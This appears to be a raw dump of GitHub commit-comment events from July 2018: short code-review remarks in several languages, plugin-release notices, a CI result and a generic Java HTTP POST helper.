{"id":"8043733247","type":"CommitCommentEvent","actor":{"login":"EvilBeaver"},"repo":{"name":"EvilBeaver/OneScript"},"payload":{"comment":{"id":29903217,"position":60,"line":62,"path":"src/ScriptEngine/Machine/TypeFactory.cs","commit_id":"f9a113adc9488fcca10813123b24ad4b21ddfb83","created_at":"2018-07-31T12:26:59Z","updated_at":"2018-07-31T12:26:59Z","author_association":"OWNER","body":"Да, мы с @dmpas уже это нашли, спасибо! Руки не дошли исправить пока."}},"created_at":"2018-07-31T12:26:59Z"}
{"id":"8043734789","type":"CommitCommentEvent","actor":{"login":"mibby"},"repo":{"name":"LogBlock/LogBlock"},"payload":{"comment":{"id":29903221,"position":null,"line":null,"path":null,"commit_id":"a1d622ebbdecc931b40555790f2ffa3b6e512690","created_at":"2018-07-31T12:27:18Z","updated_at":"2018-07-31T12:27:18Z","author_association":"NONE","body":"@Brokkonaut I assume backwards compatibility is not possible with your commits - requiring spigot 1.13+ to function?"}},"created_at":"2018-07-31T12:27:18Z"}
{"id":"8043735253","type":"CommitCommentEvent","actor":{"login":"ddt-mentor"},"repo":{"name":"ddt-sawa/meikai_cpp_sawa"},"payload":{"comment":{"id":29903225,"position":30,"line":30,"path":"7-11/7-11.cpp","commit_id":"a14434cd9b6bdc043e461a64b664ecfba86320e6","created_at":"2018-07-31T12:27:24Z","updated_at":"2018-07-31T12:27:24Z","author_association":"COLLABORATOR","body":"setw関数は右端をそろえる関数の為、今回の課題に沿っていないです(平澤)"}},"created_at":"2018-07-31T12:27:24Z"}
{"id":"8043736982","type":"CommitCommentEvent","actor":{"login":"dpfaffenbauer"},"repo":{"name":"pimcore/pimcore"},"payload":{"comment":{"id":29903228,"position":5,"line":111,"path":"lib/Composer.php","commit_id":"d01132a081a8eb1658c3c9958424b912cd66f9d5","created_at":"2018-07-31T12:27:44Z","updated_at":"2018-07-31T12:27:44Z","author_association":"CONTRIBUTOR","body":"Wouldn't this make more sense? https://github.com/Incenteev/ParameterHandler"}},"created_at":"2018-07-31T12:27:44Z"}
{"id":"8043737862","type":"CommitCommentEvent","actor":{"login":"betatim"},"repo":{"name":"jupyterhub/kubespawner"},"payload":{"comment":{"id":29903230,"position":29,"line":86,"path":"kubespawner/spawner.py","commit_id":"27056a79580df957d0cc2d7b61ecfa4ce694e4fd","created_at":"2018-07-31T12:27:54Z","updated_at":"2018-07-31T12:27:54Z","author_association":"MEMBER","body":"Please create a new issue instead of leaving comments on commits."}},"created_at":"2018-07-31T12:27:54Z"}
{"id":"8043738151","type":"CommitCommentEvent","actor":{"login":"dastanabeuov"},"repo":{"name":"dastanabeuov/thinknetica"},"payload":{"comment":{"id":29903234,"position":287,"line":287,"path":"1-Osnovy-Ruby-polnaya-PO/lesson7/interface.rb","commit_id":"45d07f947962ab51864c04f6bfd7061e49f19e91","created_at":"2018-07-31T12:27:58Z","updated_at":"2018-07-31T12:27:58Z","author_association":"OWNER","body":"da vse verno ...ispravil"}},"created_at":"2018-07-31T12:27:58Z"}
{"id":"8043743372","type":"CommitCommentEvent","actor":{"login":"haowanxing"},"repo":{"name":"gohouse/gorose"},"payload":{"comment":{"id":29903250,"position":9,"line":7,"path":"gorose.go","commit_id":"5b86438912a683eeabd0baf6182ebfb10ef6d98c","created_at":"2018-07-31T12:29:02Z","updated_at":"2018-07-31T12:29:02Z","author_association":"NONE","body":"重新get版本0.9.2后，此处包依赖找不到"}},"created_at":"2018-07-31T12:29:02Z"}
{"id":"8043744887","type":"CommitCommentEvent","actor":{"login":"dastanabeuov"},"repo":{"name":"dastanabeuov/thinknetica"},"payload":{"comment":{"id":29903258,"position":4,"line":4,"path":"1-Osnovy-Ruby-polnaya-PO/lesson7/passenger_wagon.rb","commit_id":"45d07f947962ab51864c04f6bfd7061e49f19e91","created_at":"2018-07-31T12:29:20Z","updated_at":"2018-07-31T12:29:20Z","author_association":"OWNER","body":"oroso ispravil"}},"created_at":"2018-07-31T12:29:20Z"}
{"id":"8043747414","type":"CommitCommentEvent","actor":{"login":"dodekeract"},"repo":{"name":"3YOURMIND/js-polyfill-docker"},"payload":{"comment":{"id":29903263,"position":19,"line":19,"path":"Dockerfile","commit_id":"de59293cc3cd279c2bd10fa57b3219eb84b5e467","created_at":"2018-07-31T12:29:52Z","updated_at":"2018-07-31T12:29:52Z","author_association":"MEMBER","body":"I don’t think it’s intentional that this is exposing `8801`, but using `PORT=80`?"}},"created_at":"2018-07-31T12:29:52Z"}
{"id":"8043748326","type":"CommitCommentEvent","actor":{"login":"peterhyse92"},"repo":{"name":"chanulPARK/ATOM"},"payload":{"comment":{"id":29903266,"position":null,"line":null,"path":null,"commit_id":"92c06c4bdd3d4d47e2dee7c4c43aa0aa00827f03","created_at":"2018-07-31T12:30:02Z","updated_at":"2018-07-31T12:30:02Z","author_association":"COLLABORATOR","body":"파일을 다운받은 다음 거기서 src 폴더의 서브 폴더와 web 폴더의 서브 폴더를 확인하세요."}},"created_at":"2018-07-31T12:30:02Z"}
{"id":"8043748606","type":"CommitCommentEvent","actor":{"login":"Krah-Johlito"},"repo":{"name":"Krah-Johlito/Open-PS2-Loader"},"payload":{"comment":{"id":29903268,"position":null,"line":null,"path":null,"commit_id":"eaa50b59c4ac8eb70ee57dabd1b94e6ede9c1da0","created_at":"2018-07-31T12:30:06Z","updated_at":"2018-07-31T12:30:06Z","author_association":"OWNER","body":"pointless, this broke the rename function..had it right the first time"}},"created_at":"2018-07-31T12:30:06Z"}
{"id":"8043750930","type":"CommitCommentEvent","actor":{"login":"dodekeract"},"repo":{"name":"3YOURMIND/js-polyfill-docker"},"payload":{"comment":{"id":29903286,"position":1,"line":1,"path":"environment","commit_id":"de59293cc3cd279c2bd10fa57b3219eb84b5e467","created_at":"2018-07-31T12:30:30Z","updated_at":"2018-07-31T12:30:30Z","author_association":"MEMBER","body":"These could be added as `ENV PORT 80` to the `Dockerfile`."}},"created_at":"2018-07-31T12:30:30Z"}
{"id":"8043751270","type":"CommitCommentEvent","actor":{"login":"dxball"},"repo":{"name":"streamlink/streamlink-twitch-gui"},"payload":{"comment":{"id":29903287,"position":null,"line":null,"path":null,"commit_id":"0e3deb71a6b8a7fcb0ff8d97aeaee55060cf0c87","created_at":"2018-07-31T12:30:33Z","updated_at":"2018-07-31T12:30:33Z","author_association":"CONTRIBUTOR","body":"Looks good to me "}},"created_at":"2018-07-31T12:30:33Z"}
{"id":"8043754238","type":"CommitCommentEvent","actor":{"login":"dodekeract"},"repo":{"name":"3YOURMIND/js-polyfill-docker"},"payload":{"comment":{"id":29903293,"position":2,"line":2,"path":"environment","commit_id":"de59293cc3cd279c2bd10fa57b3219eb84b5e467","created_at":"2018-07-31T12:31:06Z","updated_at":"2018-07-31T12:31:06Z","author_association":"MEMBER","body":"@fvj Is it intentional that you’re using a `dev` environment?"}},"created_at":"2018-07-31T12:31:06Z"}
{"id":"8043756752","type":"CommitCommentEvent","actor":{"login":"jum-s"},"repo":{"name":"AtelierSoude/OpenRepairPlatform"},"payload":{"comment":{"id":29903300,"position":4,"line":75,"path":"static/css/ateliersoude.css","commit_id":"2ec6c2d3fbab4e3c3edd13ddd4e60ddf39d7b1fa","created_at":"2018-07-31T12:31:34Z","updated_at":"2018-07-31T12:31:34Z","author_association":"COLLABORATOR","body":"euh ..."}},"created_at":"2018-07-31T12:31:34Z"}
{"id":"8043759313","type":"CommitCommentEvent","actor":{"login":"zapodot"},"repo":{"name":"GladeAteister/gladeateister.github.io"},"payload":{"comment":{"id":29903305,"position":null,"line":null,"path":null,"commit_id":"0312d67519b5ac65cd3fc4daadaa989105790161","created_at":"2018-07-31T12:32:06Z","updated_at":"2018-07-31T12:32:06Z","author_association":"CONTRIBUTOR","body":"Starting point for #1"}},"created_at":"2018-07-31T12:32:06Z"}
{"id":"8043760442","type":"CommitCommentEvent","actor":{"login":"jum-s"},"repo":{"name":"AtelierSoude/OpenRepairPlatform"},"payload":{"comment":{"id":29903307,"position":5,"line":68,"path":"deployment/docker-app/requirements.txt","commit_id":"2ec6c2d3fbab4e3c3edd13ddd4e60ddf39d7b1fa","created_at":"2018-07-31T12:32:18Z","updated_at":"2018-07-31T12:32:18Z","author_association":"COLLABORATOR","body":"yet another external library"}},"created_at":"2018-07-31T12:32:18Z"}
{"id":"8043760702","type":"CommitCommentEvent","actor":{"login":"xxyan0205"},"repo":{"name":"didi/mand-mobile"},"payload":{"comment":{"id":29903309,"position":null,"line":null,"path":null,"commit_id":"395e6b8e442e0e6d1a2f50571c670f95af81bba9","created_at":"2018-07-31T12:32:20Z","updated_at":"2018-07-31T12:32:20Z","author_association":"MEMBER","body":"#173 "}},"created_at":"2018-07-31T12:32:20Z"}
{"id":"8043761430","type":"CommitCommentEvent","actor":{"login":"Txucishvili"},"repo":{"name":"Txucishvili/check"},"payload":{"comment":{"id":29903312,"position":null,"line":null,"path":null,"commit_id":"e057d80ee2fbf06d29ad7839d7533845b8845227","created_at":"2018-07-31T12:32:29Z","updated_at":"2018-07-31T12:32:29Z","author_association":"OWNER","body":"123"}},"created_at":"2018-07-31T12:32:29Z"}
{"id":"8043762191","type":"CommitCommentEvent","actor":{"login":"dastanabeuov"},"repo":{"name":"dastanabeuov/thinknetica"},"payload":{"comment":{"id":29903314,"position":9,"line":9,"path":"1-Osnovy-Ruby-polnaya-PO/lesson7/passenger_wagon.rb","commit_id":"45d07f947962ab51864c04f6bfd7061e49f19e91","created_at":"2018-07-31T12:32:38Z","updated_at":"2018-07-31T12:32:38Z","author_association":"OWNER","body":"reserve delat iz metoda wagon.rb"}},"created_at":"2018-07-31T12:32:38Z"}
{"id":"8043767233","type":"CommitCommentEvent","actor":{"login":"mcurrr"},"repo":{"name":"Buggerfal/cannabis"},"payload":{"comment":{"id":29903325,"position":1,"line":1,"path":"js/main.js","commit_id":"4b39ad54f6823f870fea3299d438d63cc590df24","created_at":"2018-07-31T12:33:38Z","updated_at":"2018-07-31T12:33:38Z","author_association":"COLLABORATOR","body":"read about difference between let and const key words\r\n"}},"created_at":"2018-07-31T12:33:38Z"}
{"id":"8043768573","type":"CommitCommentEvent","actor":{"login":"protoy"},"repo":{"name":"Knight-J/Just-For-Fun"},"payload":{"comment":{"id":29903329,"position":2,"line":2,"path":"README.md","commit_id":"2bbc25479475f7fdd8876ba93c460772544d60c2","created_at":"2018-07-31T12:33:51Z","updated_at":"2018-07-31T12:33:51Z","author_association":"NONE","body":"chicken"}},"created_at":"2018-07-31T12:33:51Z"}
{"id":"8043771265","type":"CommitCommentEvent","actor":{"login":"Skylsmoi"},"repo":{"name":"tracim/tracim_v2"},"payload":{"comment":{"id":29903338,"position":7,"line":19,"path":"frontend/i18next.scanner/fr/translation.json","commit_id":"51d000cadb0c2c2fe1be8464d35063011fb1e84f","created_at":"2018-07-31T12:34:23Z","updated_at":"2018-07-31T12:34:23Z","author_association":"COLLABORATOR","body":"'Déconnecter' should have lowercase d"}},"created_at":"2018-07-31T12:34:23Z"}
{"id":"8043773073","type":"CommitCommentEvent","actor":{"login":"protoy"},"repo":{"name":"Knight-J/Just-For-Fun"},"payload":{"comment":{"id":29903351,"position":null,"line":null,"path":null,"commit_id":"99a1f28e19079072d93861b723a92685d66d3f44","created_at":"2018-07-31T12:34:40Z","updated_at":"2018-07-31T12:34:40Z","author_association":"NONE","body":"Nice grammar！"}},"created_at":"2018-07-31T12:34:40Z"}
{"id":"8043774617","type":"CommitCommentEvent","actor":{"login":"Brokkonaut"},"repo":{"name":"LogBlock/LogBlock"},"payload":{"comment":{"id":29903354,"position":null,"line":null,"path":null,"commit_id":"a1d622ebbdecc931b40555790f2ffa3b6e512690","created_at":"2018-07-31T12:34:59Z","updated_at":"2018-07-31T12:34:59Z","author_association":"MEMBER","body":"No, the changes in CB/Spigot 1.13 are too large to allow easy backwards compatibility, and I do not have the time to create a compatibility layer for that. So Logblock 1.13+ will only run in Spigot 1.13+."}},"created_at":"2018-07-31T12:34:59Z"}
{"id":"8043778336","type":"CommitCommentEvent","actor":{"login":"kazurus"},"repo":{"name":"endpass/endpass-wallet"},"payload":{"comment":{"id":29903366,"position":24,"line":55,"path":"src/components/ui/form/VForm.vue","commit_id":"e0b8b7c3b982047144e0669b09c589f75b7088bd","created_at":"2018-07-31T12:35:43Z","updated_at":"2018-07-31T12:35:43Z","author_association":"COLLABORATOR","body":"Не будет ли здесь ошибки при default null? Может проще event submit-form например? "}},"created_at":"2018-07-31T12:35:43Z"}
{"id":"8043778346","type":"CommitCommentEvent","actor":{"login":"SOF3"},"repo":{"name":"Aenteritas/MineUProtect"},"payload":{"comment":{"id":29903367,"position":null,"line":null,"path":null,"commit_id":"33f3c866d3c454947b6a6c8ef85d32849745f9bc","created_at":"2018-07-31T12:35:43Z","updated_at":"2018-07-31T12:35:43Z","author_association":"NONE","body":"> Dear @Aenteritas:\n> Regarding the release you submitted, named \"**MineUProtect**\" (v1.0.0), for the project [MineUProtect](https://poggit.pmmp.io/ci/Aenteritas/MineUProtect/MineUProtect) on 2018-07-30T15:38:12.000Z, there are some problems with the values in the submit form.\n\nCheck your plugin description.\n\n```\nDownload the source\nPut the source into your /plugins directory (Make sure that you have DevTools.phar already installed, else the plugin will not load)\nRestart your server\n```\n\nHello, are you releasing a plugin on Poggit?\n\n> Your release has been reset to draft. Please [edit the release](https://poggit.pmmp.io/edit/Aenteritas/MineUProtect/MineUProtect/1) to resolve these problems, then click \"Submit\" on the edit page to have the plugin reviewed again.\n> Note: This comment is created here because this is the last commit when the released build was created."}},"created_at":"2018-07-31T12:35:43Z"}
{"id":"8043779188","type":"CommitCommentEvent","actor":{"login":"mcurrr"},"repo":{"name":"Buggerfal/cannabis"},"payload":{"comment":{"id":29903370,"position":44,"line":44,"path":"js/main.js","commit_id":"4b39ad54f6823f870fea3299d438d63cc590df24","created_at":"2018-07-31T12:35:53Z","updated_at":"2018-07-31T12:35:53Z","author_association":"COLLABORATOR","body":"there should be no variables that contains one letter"}},"created_at":"2018-07-31T12:35:53Z"}
{"id":"8043780191","type":"CommitCommentEvent","actor":{"login":"dastanabeuov"},"repo":{"name":"dastanabeuov/thinknetica"},"payload":{"comment":{"id":29903372,"position":9,"line":9,"path":"1-Osnovy-Ruby-polnaya-PO/lesson7/passenger_wagon.rb","commit_id":"45d07f947962ab51864c04f6bfd7061e49f19e91","created_at":"2018-07-31T12:36:06Z","updated_at":"2018-07-31T12:36:06Z","author_association":"OWNER","body":"Togda i method v faile wagon.rb ( reserve ) pereimenovat v ( load ) ??"}},"created_at":"2018-07-31T12:36:06Z"}
{"id":"8043786685","type":"CommitCommentEvent","actor":{"login":"mibby"},"repo":{"name":"LogBlock/LogBlock"},"payload":{"comment":{"id":29903383,"position":null,"line":null,"path":null,"commit_id":"a1d622ebbdecc931b40555790f2ffa3b6e512690","created_at":"2018-07-31T12:37:19Z","updated_at":"2018-07-31T12:37:19Z","author_association":"NONE","body":"Okay, no worries. Was just curious so I don't update LogBlock unintentionally and break my database until fully converted over to 1.13. :)\r\n\r\nYou need to update the pom with WE/WG7. Compile fails."}},"created_at":"2018-07-31T12:37:19Z"}
{"id":"8043788321","type":"CommitCommentEvent","actor":{"login":"dastanabeuov"},"repo":{"name":"dastanabeuov/thinknetica"},"payload":{"comment":{"id":29903390,"position":9,"line":9,"path":"1-Osnovy-Ruby-polnaya-PO/lesson7/passenger_wagon.rb","commit_id":"45d07f947962ab51864c04f6bfd7061e49f19e91","created_at":"2018-07-31T12:37:37Z","updated_at":"2018-07-31T12:37:37Z","author_association":"OWNER","body":"Na proverku uje sdelal otpavil glyanite..."}},"created_at":"2018-07-31T12:37:37Z"}
{"id":"8043789863","type":"CommitCommentEvent","actor":{"login":"mcurrr"},"repo":{"name":"Buggerfal/cannabis"},"payload":{"comment":{"id":29903395,"position":50,"line":50,"path":"js/main.js","commit_id":"4b39ad54f6823f870fea3299d438d63cc590df24","created_at":"2018-07-31T12:37:54Z","updated_at":"2018-07-31T12:37:54Z","author_association":"COLLABORATOR","body":"what is the purpose of this piece of code here?"}},"created_at":"2018-07-31T12:37:54Z"}
{"id":"8043790580","type":"CommitCommentEvent","actor":{"login":"suvanl"},"repo":{"name":"DS-Development/delet"},"payload":{"comment":{"id":29903397,"position":null,"line":null,"path":null,"commit_id":"6ad94bb8fef40dcd0f9741d1eda81c6f86e99449","created_at":"2018-07-31T12:38:03Z","updated_at":"2018-07-31T12:38:03Z","author_association":"MEMBER","body":"Correction: allows **any case**, not just lowercase (as the string gets converted to lowercase regardless of its original case)."}},"created_at":"2018-07-31T12:38:03Z"}
{"id":"8043795450","type":"CommitCommentEvent","actor":{"login":"helhum"},"repo":{"name":"iresults/TYPO3-Console"},"payload":{"comment":{"id":29903410,"position":8,"line":112,"path":"Classes/Console/Mvc/Cli/CommandArgumentDefinition.php","commit_id":"63d69bdc76b3cb4e5d62b285fb49ecdec744d716","created_at":"2018-07-31T12:38:59Z","updated_at":"2018-07-31T12:38:59Z","author_association":"NONE","body":"wouldn't it suffice to change the regex here to `/([A-Z][a-z0-9]*)/`"}},"created_at":"2018-07-31T12:38:59Z"}
{"id":"8043795970","type":"CommitCommentEvent","actor":{"login":"mcurrr"},"repo":{"name":"Buggerfal/cannabis"},"payload":{"comment":{"id":29903411,"position":65,"line":65,"path":"js/main.js","commit_id":"4b39ad54f6823f870fea3299d438d63cc590df24","created_at":"2018-07-31T12:39:05Z","updated_at":"2018-07-31T12:39:05Z","author_association":"COLLABORATOR","body":"will player variable change somewhere else?"}},"created_at":"2018-07-31T12:39:05Z"}
{"id":"8043796012","type":"CommitCommentEvent","actor":{"login":"dastanabeuov"},"repo":{"name":"dastanabeuov/thinknetica"},"payload":{"comment":{"id":29903412,"position":39,"line":39,"path":"1-Osnovy-Ruby-polnaya-PO/lesson7/station.rb","commit_id":"45d07f947962ab51864c04f6bfd7061e49f19e91","created_at":"2018-07-31T12:39:06Z","updated_at":"2018-07-31T12:39:06Z","author_association":"OWNER","body":"train"}},"created_at":"2018-07-31T12:39:06Z"}
{"id":"8043798718","type":"CommitCommentEvent","actor":{"login":"aljoscha"},"repo":{"name":"apache/flink"},"payload":{"comment":{"id":29903416,"position":null,"line":null,"path":null,"commit_id":"01811317d709ad54f1e0c105d5e3e6e36f85d24d","created_at":"2018-07-31T12:39:36Z","updated_at":"2018-07-31T12:39:36Z","author_association":"CONTRIBUTOR","body":"I think you might be right. This shouldn't have ended up here.\r\n\r\n@suez1224 Does Flink 1.5.x work for you in your Kerberos environment?"}},"created_at":"2018-07-31T12:39:36Z"}
{"id":"8043799789","type":"CommitCommentEvent","actor":{"login":"Margarita4652"},"repo":{"name":"Margarita4652/Hello-world"},"payload":{"comment":{"id":29903417,"position":null,"line":null,"path":null,"commit_id":"7cdbf25eb7bc096a20f087aca2088dc753c27fcd","created_at":"2018-07-31T12:39:49Z","updated_at":"2018-07-31T12:39:49Z","author_association":"OWNER","body":"Hello"}},"created_at":"2018-07-31T12:39:49Z"}
{"id":"8043800824","type":"CommitCommentEvent","actor":{"login":"janmisar"},"repo":{"name":"joseantonioECI/Reqres"},"payload":{"comment":{"id":29903422,"position":null,"line":null,"path":null,"commit_id":"d6b7eb420375450b3018a95e16d0c4c2a7139413","created_at":"2018-07-31T12:40:00Z","updated_at":"2018-07-31T12:40:00Z","author_association":"NONE","body":"Hey! At first I'm glad you like our Reqres ❤️ I would really appreciate if you can explain your fix in a few words please! I don't understand what is it good for 🤔  Thanks!"}},"created_at":"2018-07-31T12:40:00Z"}
{"id":"8043802052","type":"CommitCommentEvent","actor":{"login":"mcurrr"},"repo":{"name":"Buggerfal/cannabis"},"payload":{"comment":{"id":29903423,"position":92,"line":92,"path":"js/main.js","commit_id":"4b39ad54f6823f870fea3299d438d63cc590df24","created_at":"2018-07-31T12:40:15Z","updated_at":"2018-07-31T12:40:15Z","author_association":"COLLABORATOR","body":"just why?"}},"created_at":"2018-07-31T12:40:15Z"}
{"id":"8043802770","type":"CommitCommentEvent","actor":{"login":"MV88"},"repo":{"name":"geosolutions-it/MapStore2"},"payload":{"comment":{"id":29903425,"position":6,"line":1300,"path":"web/client/translations/data.en-US","commit_id":"2791278d0682d09ccfef8ea1ee49797c97e31ea1","created_at":"2018-07-31T12:40:22Z","updated_at":"2018-07-31T12:40:22Z","author_association":"CONTRIBUTOR","body":"remove the extra placeHolder"}},"created_at":"2018-07-31T12:40:22Z"}
{"id":"8043806809","type":"CommitCommentEvent","actor":{"login":"MV88"},"repo":{"name":"geosolutions-it/MapStore2"},"payload":{"comment":{"id":29903435,"position":5,"line":1299,"path":"web/client/translations/data.de-DE","commit_id":"2791278d0682d09ccfef8ea1ee49797c97e31ea1","created_at":"2018-07-31T12:41:10Z","updated_at":"2018-07-31T12:41:10Z","author_association":"CONTRIBUTOR","body":"add a tab of indentation here and in the others files"}},"created_at":"2018-07-31T12:41:10Z"}
{"id":"8043811022","type":"CommitCommentEvent","actor":{"login":"mcurrr"},"repo":{"name":"Buggerfal/cannabis"},"payload":{"comment":{"id":29903442,"position":116,"line":116,"path":"js/main.js","commit_id":"4b39ad54f6823f870fea3299d438d63cc590df24","created_at":"2018-07-31T12:41:56Z","updated_at":"2018-07-31T12:41:56Z","author_association":"COLLABORATOR","body":"do you need those two last argument here?\r\n"}},"created_at":"2018-07-31T12:41:56Z"}
{"id":"8043814259","type":"CommitCommentEvent","actor":{"login":"godrm"},"repo":{"name":"code-squad/swift-coordinate"},"payload":{"comment":{"id":29903451,"position":9,"line":52,"path":"CoordinateCalculator/CoordinateCalculator/MyPoint.swift","commit_id":"9aaa48ec78d1ffd1fe1a5700c7d17b33e04e8d6c","created_at":"2018-07-31T12:42:34Z","updated_at":"2018-07-31T12:42:34Z","author_association":"CONTRIBUTOR","body":"이게 이렇게 구현된 이유는 MyPoint는 필요없는 프로토콜이죠. \r\n객체지향 설계원칙에서 5번째를 생각해보세요. 불필요한 인터페이스를 채택하지 않도록, 인터페이스를 분리해야 합니다. "}},"created_at":"2018-07-31T12:42:34Z"}
{"id":"8043815737","type":"CommitCommentEvent","actor":{"login":"beiyoujun"},"repo":{"name":"beiyoujun/Designers-Learn-Git"},"payload":{"comment":{"id":29903455,"position":1,"line":1,"path":"README.md","commit_id":"f7f011953734a4a3005160062f485fc453f699c1","created_at":"2018-07-31T12:42:51Z","updated_at":"2018-07-31T12:42:51Z","author_association":"OWNER","body":"dasd"}},"created_at":"2018-07-31T12:42:51Z"}
{"id":"8043819189","type":"CommitCommentEvent","actor":{"login":"mcurrr"},"repo":{"name":"Buggerfal/cannabis"},"payload":{"comment":{"id":29903461,"position":168,"line":168,"path":"js/main.js","commit_id":"4b39ad54f6823f870fea3299d438d63cc590df24","created_at":"2018-07-31T12:43:32Z","updated_at":"2018-07-31T12:43:32Z","author_association":"COLLABORATOR","body":"where any of this arguments becomes part of functions logic?"}},"created_at":"2018-07-31T12:43:32Z"}
{"id":"8043822241","type":"CommitCommentEvent","actor":{"login":"u-fischer"},"repo":{"name":"u-fischer/lua-font-pond"},"payload":{"comment":{"id":29903469,"position":null,"line":null,"path":null,"commit_id":"00e1aa9aa4f6bbed190e716ae8c48fc4f74b4124","created_at":"2018-07-31T12:44:06Z","updated_at":"2018-07-31T12:44:06Z","author_association":"OWNER","body":"@zauguin  Looks ok now. It runs again with miktex ;-)-"}},"created_at":"2018-07-31T12:44:06Z"}
{"id":"8043822529","type":"CommitCommentEvent","actor":{"login":"mcurrr"},"repo":{"name":"Buggerfal/cannabis"},"payload":{"comment":{"id":29903470,"position":169,"line":169,"path":"js/main.js","commit_id":"4b39ad54f6823f870fea3299d438d63cc590df24","created_at":"2018-07-31T12:44:09Z","updated_at":"2018-07-31T12:44:09Z","author_association":"COLLABORATOR","body":"what's the point of this code here?"}},"created_at":"2018-07-31T12:44:09Z"}
{"id":"8043827920","type":"CommitCommentEvent","actor":{"login":"SOF3"},"repo":{"name":"georgianYT/Soup"},"payload":{"comment":{"id":29903489,"position":null,"line":null,"path":null,"commit_id":"e3ea75db03829fa6ee252009f4fded496450a881","created_at":"2018-07-31T12:45:09Z","updated_at":"2018-07-31T12:45:09Z","author_association":"NONE","body":"> Dear @georgianYT:\n> Regarding the release you submitted, named \"**Soup**\" (v1.0.0), for the project [Soup](https://poggit.pmmp.io/ci/georgianYT/Soup/Soup) on 2018-07-31T01:37:58.000Z, there are some problems with the values in the submit form.\n\nDescription is missing.\n\n> Your release has been reset to draft. Please [edit the release](https://poggit.pmmp.io/edit/georgianYT/Soup/Soup/10) to resolve these problems, then click \"Submit\" on the edit page to have the plugin reviewed again.\n> Note: This comment is created here because this is the last commit when the released build was created."}},"created_at":"2018-07-31T12:45:09Z"}
{"id":"8043833274","type":"CommitCommentEvent","actor":{"login":"mcurrr"},"repo":{"name":"Buggerfal/cannabis"},"payload":{"comment":{"id":29903504,"position":194,"line":194,"path":"js/main.js","commit_id":"4b39ad54f6823f870fea3299d438d63cc590df24","created_at":"2018-07-31T12:46:05Z","updated_at":"2018-07-31T12:46:05Z","author_association":"COLLABORATOR","body":"better rename this to isCollide and getIsCollide + no vars"}},"created_at":"2018-07-31T12:46:05Z"}
{"id":"8043835296","type":"CommitCommentEvent","actor":{"login":"Brokkonaut"},"repo":{"name":"LogBlock/LogBlock"},"payload":{"comment":{"id":29903511,"position":null,"line":null,"path":null,"commit_id":"a1d622ebbdecc931b40555790f2ffa3b6e512690","created_at":"2018-07-31T12:46:28Z","updated_at":"2018-07-31T12:46:28Z","author_association":"MEMBER","body":"https://github.com/LogBlock/LogBlock/blob/a1d622ebbdecc931b40555790f2ffa3b6e512690/pom.xml#L55-L66\r\n\r\nIt is already updated for WE/WG7. But as there is no public maven repository for WE/WG7 builds you have to build them yourself & install them to your local maven repository before building LogBlock.\r\n`./gradlew clean build install` in the we/wg base folder"}},"created_at":"2018-07-31T12:46:28Z"}
{"id":"8043835890","type":"CommitCommentEvent","actor":{"login":"palaso-bob"},"repo":{"name":"sillsdev/liblcm"},"payload":{"comment":{"id":29903513,"position":null,"line":null,"path":null,"commit_id":"751ea51101d69f11810cb3069d046674f2499039","created_at":"2018-07-31T12:46:33Z","updated_at":"2018-07-31T12:46:33Z","author_association":"NONE","body":"TeamCity LCM :: liblcm-win32-master Continuous [Build 236](http://build.palaso.org/viewLog.html?buildId=125977&buildTypeId=Liblcm_LiblcmWin32masterContinuous) outcome was **SUCCESS**\nSummary: Tests passed: 2608, ignored: 44 Build time: 00:01:36"}},"created_at":"2018-07-31T12:46:33Z"}
{"id":"8043837048","type":"CommitCommentEvent","actor":{"login":"sajjadjaved01"},"repo":{"name":"sajjadjaved01/iptv"},"payload":{"comment":{"id":29903516,"position":null,"line":null,"path":null,"commit_id":"6b8d66bcb8439c6920cff2e7488b049150621799","created_at":"2018-07-31T12:46:45Z","updated_at":"2018-07-31T12:46:45Z","author_association":"OWNER","body":"u have to update Adapter for this "}},"created_at":"2018-07-31T12:46:45Z"}
{"id":"8043837551","type":"CommitCommentEvent","actor":{"login":"Rainbowperfect"},"repo":{"name":"Rainbowperfect/perfect"},"payload":{"comment":{"id":29903518,"position":null,"line":null,"path":null,"commit_id":"a8e9c1fbc952e7dd262de6556ec5953c322873ac","created_at":"2018-07-31T12:46:52Z","updated_at":"2018-07-31T12:46:52Z","author_association":"OWNER","body":"public static String sendPost(String url, String param, int timeOut) throws Exception {\n    \t\n        PrintWriter out = null;\n        BufferedReader in = null;\n        StringBuilder resultSB = new StringBuilder();\n        String errInfo = \"success\", rTime = \"\";\n        try {\n        \tlong startTime = System.currentTimeMillis(); //==================================请求起始时间_毫秒\n            URL realUrl = new URL(url);\n            // 打开和URL之间的连接\n            URLConnection conn = realUrl.openConnection();\n            // 设置通用的请求属性\n            conn.setRequestProperty(\"accept\", \"*/*\");\n            conn.setRequestProperty(\"connection\", \"Keep-Alive\");\n            conn.setRequestProperty(\"user-agent\", \"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;SV1)\");\n            //设置超时\n            conn.setConnectTimeout(timeOut); //连接主机的超时时间（单位：毫秒）\n            conn.setReadTimeout(timeOut);    //设置从主机读取数据超时（单位：毫秒）\n            // 发送POST请求必须设置如下两行\n            conn.setDoOutput(true);\n            conn.setDoInput(true);\n            // 获取URLConnection对象对应的输出流\n            out = new PrintWriter(conn.getOutputStream());\n            // 发送请求参数\n            out.print(param);\n            // flush输出流的缓冲\n            out.flush();\n            // 定义BufferedReader输入流来读取URL的响应\n            in = new BufferedReader(new InputStreamReader(conn.getInputStream()));\n            long endTime = System.currentTimeMillis();\t//==================================请求结束时间_毫秒\n            String line;\n            while ((line = in.readLine()) != null) {\n            \tresultSB.append(line);\n            }\n            rTime = String.valueOf(endTime - startTime);\n        } catch (Exception e) {\n        \terrInfo = \"error\";\n            //System.out.println(\"发送 POST 请求出现异常！\"+e);\n            //e.printStackTrace();\n        \tthrow new MyExceptionBusiness(e);\n        }\n        //使用finally块来关闭输出流、输入流\n        finally{\n            try{\n                if(out != null){\n                    out.close();\n                }\n                if(in != null){\n                    in.close();\n                }\n            }\n            catch(IOException ex){\n                ex.printStackTrace();\n                //throw new MyExceptionBusiness(ex);\n            }\n        }\n        \n        return resultSB.toString();\n    }"}},"created_at":"2018-07-31T12:46:52Z"}
{"id":"8043837932","type":"CommitCommentEvent","actor":{"login":"mcurrr"},"repo":{"name":"Buggerfal/cannabis"},"payload":{"comment":{"id":29903520,"position":216,"line":216,"path":"js/main.js","commit_id":"4b39ad54f6823f870fea3299d438d63cc590df24","created_at":"2018-07-31T12:46:56Z","updated_at":"2018-07-31T12:46:56Z","author_association":"COLLABORATOR","body":"why not use map method?"}},"created_at":"2018-07-31T12:46:56Z"}
